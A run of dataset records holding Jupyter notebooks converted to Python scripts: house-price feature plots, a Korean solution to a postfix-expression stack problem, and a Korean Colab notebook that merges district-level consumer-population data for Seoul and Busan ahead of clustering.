plt.subplot(2,2,4)\nsns.boxplot(y='MSSubClass',data=df,ax=ax4,palette='pastel')\nax4=plt.title('BoxPlot')\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HokUpi6f6VOy\" outputId=\"81ea70f0-93a3-405b-ca9f-90c8186d9f47\"\nprint(df['MSZoning'].unique())\n\n# + [markdown] id=\"34J36exp6eJh\"\n# MSZoning\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"QvUPTbOr6H98\" outputId=\"f1d91901-d278-4a7c-93c4-53185dc453e9\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['MSZoning'],ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='MSZoning',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['MSZoning'],kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\ndf.groupby(['MSZoning']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('MSZoning')\nax4=plt.title('Pie Chart')\nplt.show()\n\n# + [markdown] id=\"UbVskrye8TI2\"\n# LotFrontage\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 714} id=\"-c1G3xtu8JhY\" outputId=\"6bf882f3-2b04-4f26-e68d-73ca91978bb3\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\ndf.plot(kind='scatter',x='LotFrontage',y='SalePrice',color='pink',ax=ax1)\nax1=plt.title('Scatter Plot')\nax2 = plt.subplot(2,2,2)\nsns.regplot(x='LotFrontage',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Regression Plot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['LotFrontage'],kde=True,color='red',ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\nsns.boxplot(y='LotFrontage',data=df,ax=ax4,palette='pastel')\nax4=plt.title('Box Plot')\nplt.show()\n\n\n# + [markdown] id=\"p6lfHcrC-ORP\"\n# Lot Area\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 711} id=\"86eWnZil-DyA\" outputId=\"6d5a3e38-fce5-4f92-a9d3-49159da8c4e6\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\ndf.plot(kind='scatter',x='LotArea',y='SalePrice',color='pink',ax=ax1)\nax1=plt.title('Scatter Plot')\nax2 = plt.subplot(2,2,2)\nsns.regplot(x='LotArea',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Regression Plot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['LotArea'],kde=True,color='red',ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\nsns.boxplot(y='LotArea',data=df,ax=ax4,palette='pastel')\nax4=plt.title('Box Plot')\nplt.show()\n\n# + [markdown] id=\"l5BidpKBDhR7\"\n# GarageQual\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"utlxLgHJDi7y\" outputId=\"42e57968-ad65-43f2-c971-b5c12a4f8462\"\nprint(df['GarageQual'].unique())\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"mpVUpIIZ_3gp\" outputId=\"a63e0472-fbf3-4978-ecf1-70eafcdfce2b\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['GarageQual'].dropna(),ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='GarageQual',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['GarageQual'].dropna(),kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\ndf.groupby(['GarageQual']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('GarageQual')\nax4=plt.title('Pie Chart')\nplt.show()\n\n# + [markdown] id=\"EJLo0aDwDzJd\"\n# PavedDrive\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"M-wCszXUD0pS\" outputId=\"c36836b7-a192-41ae-c3d7-9958a1a288a6\"\nprint(df['PavedDrive'].unique())\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"jV_S8fDiD3DH\" outputId=\"cc9a9f87-591d-4598-9082-3b7a61c31696\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['PavedDrive'].dropna(),ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='PavedDrive',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['PavedDrive'].dropna(),kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\ndf.groupby(['PavedDrive']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('PavedDrive')\nax4=plt.title('Pie Chart')\nplt.show()\n\n","repo_name":"doaa1012/-Visualisation-Projects","sub_path":"House_Price.ipynb","file_name":"House_Price.ipynb","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"71101466984","text":"# https://www.acmicpc.net/problem/1935\n#\n# ![그래프](./image/1.png)\n\n# 후위 표기식은 대표적인 스택 문제이다.\n# 후위 표기식 자체가 스택을 사용하여 계산을 하는 프로그램이기 때문이다.\n\n# +\nn = int(input())\nword = input()\nnum_list = [int(input()) for _ in range(n)]\n\nstack = []\nfor i in word:\n if i.isalpha():\n stack.append(num_list[ord(i) - 65]) # ord() 함수는 하나의 문자열을 인자로 받고 유니코드 정수를 반환한다.(A의 경우 65을 반환한다.)\n else:\n a = stack.pop()\n b = stack.pop()\n \n if i == '+':\n c = b + a # 두 숫자 중, 먼저 들어간 것을 앞에 사용해야 후위 표기식이 완성된다.\n\n elif i == '-':\n c = b - a\n\n elif i == '*':\n c = b * a\n \n elif i == '/':\n c = b / a\n \n stack.append(c)\n\nprint('%.2f' %stack[0]) # 출력은 문제에 맞게 소수점 둘째 자리까지 나타낸다.\n","repo_name":"gukwanglim/programmers","sub_path":"알고리즘/스택/1. (백)후위 표기식2.ipynb","file_name":"1. (백)후위 표기식2.ipynb","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"19404482656","text":"# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"9A_kQmx6Doij\" outputId=\"ad057d90-574e-4fbe-84f4-0d396a59b6d4\"\nfrom google.colab import drive\ndrive.mount('/content/gdrive')\n\n# + id=\"4Z8E86wqDy7g\"\nimport io\nimport pandas as pd\n\n# + id=\"B-7tgjtpD588\"\nfile_name1 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_교과학원분야_소비인구.csv'\n\n# + id=\"00hdSNJ3EBvf\"\ndf1 = pd.read_csv(file_name1)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"BvVNgXtvSgps\" outputId=\"5c817c6b-d644-4c1b-c4f4-e8d8a7aee0fb\"\ndf1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"alf5iqGPim9z\" outputId=\"bcc0f567-b542-4295-bbab-b1ed10e2acad\"\ndf1.info()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"PBtbVgJsFDz8\" outputId=\"233f35d9-a579-4dae-8b01-800770b17c73\"\ndf1\n\n# + id=\"EyL2PpJMSVeX\"\ndf1_s = df1[df1['bntr_nm'] == '서울특별시']\ndf1_b = df1[df1['bntr_nm'] == '부산광역시']\ndf1 = pd.concat([df1_s,df1_b])\n\n# + id=\"vdWFdjXJTUZP\"\ndf1=df1[['bntr_nm','행정동','교과학원분야 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"PxnFs1HmW6F2\" outputId=\"8774791b-7f75-4ddf-974f-906af934be4c\"\ndf1\n\n# + id=\"frEjlEZsTkQ4\"\ndf1 = df1.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"BJj2i7k1TmFf\" outputId=\"25f2d2a0-98ab-46f5-ca09-cf38da01f2e7\"\ndf1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1hEEcYFpizKx\" outputId=\"4429b0be-b343-461c-d2f7-f95657656b4b\"\ndf1.info()\n\n# + id=\"zmA0vSNTEFYd\"\nfile_name2 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_동네가게_소비인구_201127.csv'\n\n# + id=\"BGg2NC2YEOqe\"\ndf2 = pd.read_csv(file_name2)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"zSZD5u1xFNXc\" outputId=\"b5e0ea37-edb7-4ec7-adaf-4ed7f589a7b8\"\ndf2\n\n# + id=\"lEFN3owoHat_\"\ndf2= df2[['bntr_nm','행정동','동네가게 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"GhRzbkDvF6Ui\" outputId=\"f53b9d88-e870-4481-f7e1-96c9d38bb260\"\ndf2\n\n# + id=\"Xa7k5H7cI9p-\"\ndf2 = df2.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"TtPOnA39JHPd\" outputId=\"89942842-4de9-437d-84bf-6034569ffb7d\"\ndf2\n\n# + id=\"SzoHEvJ5EQ_p\"\nfile_name3 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_약국분야_소비인구_201127.csv'\n\n# + id=\"c0W44DrmEVRt\"\ndf3 = pd.read_csv(file_name3)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"v8E08rL5FPj8\" outputId=\"574654c5-d836-4240-e2dc-c8b8bc2dc107\"\ndf3\n\n# + id=\"6zNQBCXaJK55\"\ndf3_s = df3[df3['bntr_nm'] == '서울특별시']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"DUMOp55uKmS-\" outputId=\"a455b021-31a5-4425-8a54-3b0a31ea853f\"\ndf3_s\n\n# + id=\"Fn89PDp6F-15\"\ndf3_b =df3[df3['bntr_nm'] == '부산광역시']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"e84M3m8IKtgr\" outputId=\"9f0a9a31-0484-41a2-b9e9-6108f56b748d\"\ndf3_b\n\n# + id=\"gySPlbN9KHAU\"\ndf3 = pd.concat([df3_s,df3_b])\n\n# + id=\"ciSdEIIOK4tD\"\ndf3 = df3[['bntr_nm','행정동','약국분야 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"BW7zvbWFGHSA\" outputId=\"f84585c1-d7be-4921-d451-997272ee117c\"\ndf3\n\n# + id=\"b5y3bKq7Lif-\"\ndf3 = df3.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"Cr2FsbRSLrT5\" outputId=\"79573767-cc41-4b2e-c051-7fa7300cc985\"\ndf3\n\n# + id=\"Np1DOOYcEVcZ\"\nfile_name4 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_외식_일식_생선회분야_소비인구(2020.03_2020.05).csv'\n\n# + id=\"b8Anhbs6Ecfu\"\ndf4 = pd.read_csv(file_name4)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"C-1v71sLFRAD\" outputId=\"88d61526-cb63-4c70-c216-727643f7e568\"\ndf4\n\n# + id=\"cKXACoypK_05\"\ndf4_s = df4[df4['brtc_nm'] == '서울특별시']\n\n# + id=\"nGmbTgCALKmk\"\ndf4_b = df4[df4['brtc_nm'] == '부산광역시']\n\n# + id=\"PBDvkxGMLPAU\"\ndf4 = pd.concat([df4_s,df4_b])\n\n# + id=\"2wU54M8TGlB8\"\ndf4 =df4[['brtc_nm','행정동','외식 일식 소비 인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"33_2VgKAGrML\" outputId=\"613b0614-5b3d-41c2-d8f6-fa8740940dbf\"\ndf4\n\n# + id=\"3WAHlby7L2Rr\"\ndf4 = df4.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"1N3wSv8XL6HB\" outputId=\"e638bd3a-8187-4d27-828d-4ae529d73e99\"\ndf4\n\n# + id=\"IotYZJmQEe96\"\nfile_name5 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_외식_중식_양식분야_소비인구(2020.03_2020.05).csv'\n\n# + id=\"6l2L0Ex2EfF7\"\ndf5 = pd.read_csv(file_name5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"XDBCc3c-MMQg\" outputId=\"48b01d0f-61c1-4749-8e64-58ec644c3b0b\"\ndf5\n\n# + id=\"UaEHQBr8MIQg\"\ndf5_s = df5[df5['brtc_nm'] == '서울특별시']\n\n# + id=\"uIkefjreMT5t\"\ndf5_b = df5[df5['brtc_nm'] == '부산광역시']\n\n# + id=\"GN1DRpTsMWCq\"\ndf5 = pd.concat([df5_s,df5_b])\n\n# + id=\"pq8Mbrq7GtX-\"\ndf5 = df5[['brtc_nm','행정동','중식/양식 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"ZcIyzyosFSj3\" outputId=\"2dba12e9-46cc-4f0f-b6cf-3470dbd5323d\"\ndf5\n\n# + id=\"OOzMT2efL_m4\"\ndf5 = df5.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"O-sPe_-ZMD8Y\" outputId=\"e5054f41-86cf-4656-c11b-f107d84e10ab\"\ndf5\n\n# + id=\"eqnFoIJ7EmX-\"\nfile_name6 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_유흥분야_소비인구_201127.csv'\n\n# + id=\"r8dhAUwKEma3\"\ndf6 = pd.read_csv(file_name6)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"lvIK3z-CG7CG\" outputId=\"5c836eb4-64f5-40b3-e52d-8f9a4693e124\"\ndf6\n\n# + id=\"W3hGkpBCM3dB\"\ndf6_s = df6[df6['bntr_nm'] == '서울특별시']\n\n# + id=\"XWiF2Oi-M3kd\"\ndf6_b = df6[df6['bntr_nm'] == '부산광역시']\n\n# + id=\"vmzMMThONLu9\"\ndf6 = pd.concat([df6_s,df6_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"_JD_Z2YiG3fH\" outputId=\"f50b0e02-371a-42ee-b53f-b070e9e0c512\"\ndf6[['bntr_nm','행정동','유흥분야 소비인구']]\n\n# + id=\"D_PkYIsxNS9x\"\ndf6 = df6.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"bjfx0-i2NZAz\" outputId=\"c46a966e-31d2-4a86-803a-a2e3141acf43\"\ndf6\n\n# + id=\"J_aPJ6KBEw4A\"\nfile_name7 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_자동차관련분야_소비인구_201127.csv'\n\n# + id=\"wFP9MlMWNWmn\"\n\n\n# + id=\"9sEt44uuEw6g\"\ndf7 = pd.read_csv(file_name7)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"yjx9Ehr_HGlf\" outputId=\"aec140c9-327e-43b9-d7a9-722c3224e0da\"\ndf7\n\n# + id=\"ZQKsRIsbPqjY\"\ndf7_s = df7[df7['bntr_nm'] == '서울특별시']\ndf7_b = df7[df7['bntr_nm'] == '부산광역시']\ndf7 = pd.concat([df7_s,df7_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"mBrntbIMHDVe\" outputId=\"6101819b-fbc5-40b0-b792-b3c5f33146a4\"\ndf7[['bntr_nm','행정동','자동차 관련 소비인구']]\n\n# + id=\"DS5j65SbPo1s\"\ndf7 = df7.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"NQSL6eE3P_En\" outputId=\"785db5ba-7a6c-4d2c-8199-4585265651da\"\ndf7\n\n# + id=\"d_BpkzIiE3PM\"\nfile_name8 ='/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_편의점분야_소비인구_201127.csv'\n\n# + id=\"kHBbE7-7E3SF\"\ndf8 = pd.read_csv(file_name8)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"XBZkWqbBHNDr\" outputId=\"bd9a39d2-2b3b-4545-d998-5f2f56c29632\"\ndf8\n\n# + id=\"3xqSnj57QEJL\"\ndf8_s = df8[df8['bntr_nm'] == '서울특별시']\ndf8_b = df8[df8['bntr_nm'] == '부산광역시']\ndf8 = pd.concat([df8_s,df8_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"28oXNDQPHLUW\" outputId=\"c388fdbf-196d-4d87-a7d4-707b8b94d975\"\ndf8[['bntr_nm','행정동','편의점 소비 인구']]\n\n# + id=\"lbclwIkTHSRX\"\ndf8 = df8.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"eZ5RBqXmQO0O\" outputId=\"d518a61a-8e6a-4a1c-f394-669357b116ac\"\ndf8\n\n# + id=\"k0LWDKwUUc5u\"\ndata = pd.merge(df1, df2,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"A4jFGWp_Ulkx\" outputId=\"495472ef-2806-4b03-eab0-fc3bb352c771\"\ndata\n\n# + id=\"8j0J7LgFUo9F\"\ndata1 = pd.merge(data, df3 ,how = 'outer', on = '행정동')\n\n# + id=\"NYyhL2j7Uo_X\"\ndata2 = pd.merge(df4, df5 ,how = 'outer', on = '행정동')\n\n# + id=\"SQE5XzmiU2N4\"\ndata3 = pd.merge(df6, df7 ,how = 'outer', on = '행정동')\n\n# + id=\"s4RTRmB2U5mQ\"\ndata4 = pd.merge(data1, df8 ,how = 'outer', on = '행정동')\n\n# + id=\"jUyLa2teVWvC\"\ndata5 = pd.merge(data1, data2 ,how = 'outer', on = '행정동')\n\n# + id=\"FzhKjbDyVW4w\"\nfinal_data = pd.merge(data5, data3 ,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 534} id=\"R8HV5E3JVlGU\" outputId=\"ab51cb73-1115-49a2-ec1c-689504f44bc2\"\nfinal_data\n\n# + id=\"2QyGXrFUTgle\"\nfinal_data = final_data.reset_index()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 502} id=\"Km1FTaaDTokG\" outputId=\"5b7fa7b7-cd70-4c04-ab86-ea6e5d88c717\"\nfinal_data\n\n# + id=\"fJ5gp3XZTqQb\"\nfinal_data = final_data[final_data['행정동'] != '소계']\n\n# + id=\"m3TZID8qTtOx\"\ndel final_data['법정동 데이터']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"wV6QgkS4TtV5\" outputId=\"8b4fd951-ae3f-4e8b-89a2-de531fcde1df\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"xcSXyUYGVGvV\" outputId=\"18e3ba51-91e7-4d3c-de0c-ec60c7c08cd6\"\nfinal_data[final_data['유흥분야 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"gN1tic01VgUL\" outputId=\"a04d6912-e280-4da8-fb73-e33b148563c1\"\nfinal_data[final_data['자동차 관련 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"8fkHrOvTVpvk\" outputId=\"5cef12b1-99ec-40ce-e994-5e1fdf15395a\"\nfinal_data[final_data['교과학원분야 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"ULT_-j7sVp2y\" outputId=\"41f5f3b4-06a8-4f3c-a995-60fd4457d352\"\nfinal_data[final_data['동네가게 소비인구'].isnull()]\n\n# + id=\"6BumFmHsX6Km\"\ndel final_data['행정동 코드']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"bcOKaSJYWAS8\" outputId=\"a91c01f4-52ac-4686-fdb3-cc4caec5b0a5\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"SrMYrJJAY3My\" outputId=\"332cc97e-272a-4cfa-c07d-c5a4494e4b75\"\nfinal_data.columns\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"EHyqU7d4cump\" outputId=\"b3884040-10cb-4c69-ae25-bf035e03ceea\"\nfinal_data.isnull()\n\n# + id=\"8HpaXx6peUbk\"\nfinal_data['동네가게_소비인구'] = final_data['동네가게 소비인구']\n\n# + id=\"aKjSslmjeewV\"\nfinal_data['유흥분야_소비인구'] = final_data['유흥분야 소비인구']\n\n# + id=\"ypvU_6ilfYj7\"\nfinal_data['교과학원분야_소비인구'] = final_data['교과학원분야 소비인구']\n\n# + id=\"kMx0aAv6fYmm\"\nfinal_data['약국분야_소비인구'] = final_data['약국분야 소비인구']\n\n# + id=\"c2Q7jjNgfY38\"\nfinal_data['자동차관련_소비인구'] = final_data['자동차 관련 소비인구']\n\n# + id=\"8Y9pJnKEeniA\"\nfinal_data = final_data[['행정동','교과학원분야_소비인구', '동네가게_소비인구', '약국분야_소비인구', '외식 일식 소비 인구',\n '중식/양식 소비인구', '유흥분야_소비인구', '자동차관련_소비인구']]\n\n# + id=\"2mX8h7cJYEj2\"\n결측인덱스 = final_data.isnull().query(\"동네가게_소비인구 == True and 유흥분야_소비인구 == True\").index\n\n# + id=\"FoORNTgcf84X\"\n\n\n# + id=\"vIPym6WZfMaG\"\nfinal_data = final_data.drop(결측인덱스, axis = 0)\n\n# + id=\"XkSf_eKigP_D\"\n결측인덱스1 = final_data.isnull().query(\"자동차관련_소비인구 == True and 교과학원분야_소비인구 == True\").index\n\n# + id=\"nlBy6DPFgXzL\"\n\n\n# + id=\"IK98Ug1RgESO\"\nfinal_data = final_data.drop(결측인덱스1, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"_n7edIiOfUGw\" outputId=\"57e0aa68-32a1-48e5-aa97-8a26464719c7\"\nfinal_data\n\n# + id=\"YRc1bplSgZVP\"\n결측인덱스2 = final_data.isnull().query(\"교과학원분야_소비인구 == True and 동네가게_소비인구 == True\").index\n\n# + id=\"gjZdmsK3ghvB\"\nfinal_data = final_data.drop(결측인덱스2, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"e7cOVBhfjKDd\" outputId=\"769120fe-d014-40e0-8027-a1c8f2c04eeb\"\nfinal_data.info()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"xN5Svj_wgolK\" outputId=\"114253a4-1177-47ff-8100-aa6966df39c3\"\nfinal_data\n\n# + id=\"DZVLtWKjjndP\"\nimport numpy as np\n\n# + id=\"zqa6Lt1kjV23\"\nfinal_data = final_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"OY5uZWBUjsLJ\" outputId=\"260c9d16-0ebb-40b5-92a0-52194b1a95f6\"\nfinal_data\n\n# + id=\"9T-Sgxq-jXg1\"\nfinal_data = final_data[final_data['행정동'] != '소계']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"Mk5-2xHDg4UB\" outputId=\"a658bc16-0247-467a-8550-9ebac3c5f6df\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 49} id=\"rRzB2FiNjgBU\" outputId=\"ce733222-efab-4257-bebd-e504093080b6\"\nfinal_data[final_data['행정동'] == 0]\n\n# + id=\"6izI-Zb_kWGh\"\nfinal_data.to_csv('file.csv',encoding='utf-8-sig')\n\n# + id=\"edfHpw-ukMUf\"\ncoffee = '/content/gdrive/MyDrive/기계학습 기초/행정동별_커피분야_소비인구_201127.csv'\n\n# + id=\"kFeqS6_WsIf5\"\ncoffee_df = pd.read_csv(coffee)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"GtBgc5bJsVBn\" outputId=\"9734b3ea-61c3-49e8-a8e6-156c228fbc56\"\ncoffee_df\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"LImxzh5zxLuy\" outputId=\"50a146f6-c9a0-4cf4-8904-0e876c870653\"\ncoffee_df.columns\n\n# + id=\"50L_T5Azw382\"\ncoffee_s = coffee_df[coffee_df['bntr_nm'] == '서울특별시']\ncoffee_b = coffee_df[coffee_df['bntr_nm'] == '부산광역시']\ncoffee_df = pd.concat([coffee_s,coffee_b])\n\n# + id=\"uTXIKDUmvAYQ\"\ncoffee_df['행정동'] = coffee_df['adstrd_nm']\n\n# + id=\"gqGldct_sWth\"\ncoffee_df['커피 소비 인구'] = coffee_df['cnsmr_popltn_co']\n\n# + id=\"v3ZgiBWwu5Bs\"\ncoffee_df = coffee_df[['행정동','커피 소비 인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"gN3JtqwnvME2\" outputId=\"69b451f2-a860-4cee-c1bb-34b0d9fb8de2\"\ncoffee_df\n\n# + id=\"HB1pGvRCw07e\"\n\n\n# + id=\"0oo3R-81wkFi\"\ncoffee_df = coffee_df.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"bMKXcFibwooU\" outputId=\"4d1cae95-924a-4f1a-c862-f5b9fb4f88cf\"\ncoffee_df\n\n# + id=\"xrdTk06GvQvl\"\narea = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동 면적.xlsx'\n\n# + id=\"DipngH5uwVvA\"\narea_df = pd.read_excel(area)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"T-hhS8DowYh1\" outputId=\"8f27e0b6-814e-4f80-def8-182eb04170d0\"\narea_df\n\n# + id=\"AKTG4eSLweae\"\ncoffee_data = pd.merge(coffee_df, area_df ,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"svynxgvCxpj7\" outputId=\"566ea406-d3cc-47f8-b5da-8d49926e087f\"\ncoffee_data\n\n# + id=\"wEXPTf4hxtkX\"\ncoffee_data = coffee_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"4TjCr_Vgx7Pj\" outputId=\"f4ac2acc-e3db-4a60-bb54-466e0bc6821f\"\ncoffee_data\n\n# + id=\"J65-kYJTx8rt\"\ncoffee_data['면적 대비 커피 소비 인구'] = coffee_data['커피 소비 인구']/coffee_data['면적']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"23BeJiXsyIV6\" outputId=\"b599ecdc-6ee1-4236-a978-802089aeee49\"\ncoffee_data\n\n# + id=\"NHvAtgnayJlW\"\ncoffee_data.to_csv('coffee.csv',encoding='utf-8-sig')\n\n# + id=\"11dlic6mgI70\"\ncoffee_data['label'] = coffee_data['면적 대비 커피 소비 인구']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"hjchJ6BvyUMA\" outputId=\"28f47042-d131-40be-d832-718c129df700\"\ncoffee_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"61IAymiLbzcE\" outputId=\"e84a865c-78b0-408f-abf6-5496d35c43cd\"\ncoffee_data['label'][coffee_data['면적 대비 커피 소비 인구'] > 233686.0203619244] = 1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"C6hiXfvOhZtL\" outputId=\"7e0c7ca1-f77d-47ec-cbb7-5c0495146d72\"\ncoffee_data['label'][coffee_data['면적 대비 커피 소비 인구'] <= 233686.0203619244] = 2\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"YSX7mWQ9hiqC\" outputId=\"fd2c6971-dfd4-4fab-a813-211fb5b47413\"\ncoffee_data\n\n# + id=\"Hhmx6x2udQJR\"\ncoffee_data = coffee_data[['행정동','면적 대비 커피 소비 인구','label']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"tX0aQ-8mhz-d\" outputId=\"c87cf834-0069-4475-8009-28ae8c708f2c\"\ncoffee_data\n\n# + id=\"y5H-Pgwpi-t_\"\ncoffee_data = coffee_data[coffee_data['행정동'] != '소계']\n\n# + id=\"0ukCs7mjidGT\"\nfinal_data = pd.merge(final_data, coffee_data,how = 'outer', on = '행정동')\n\n# + 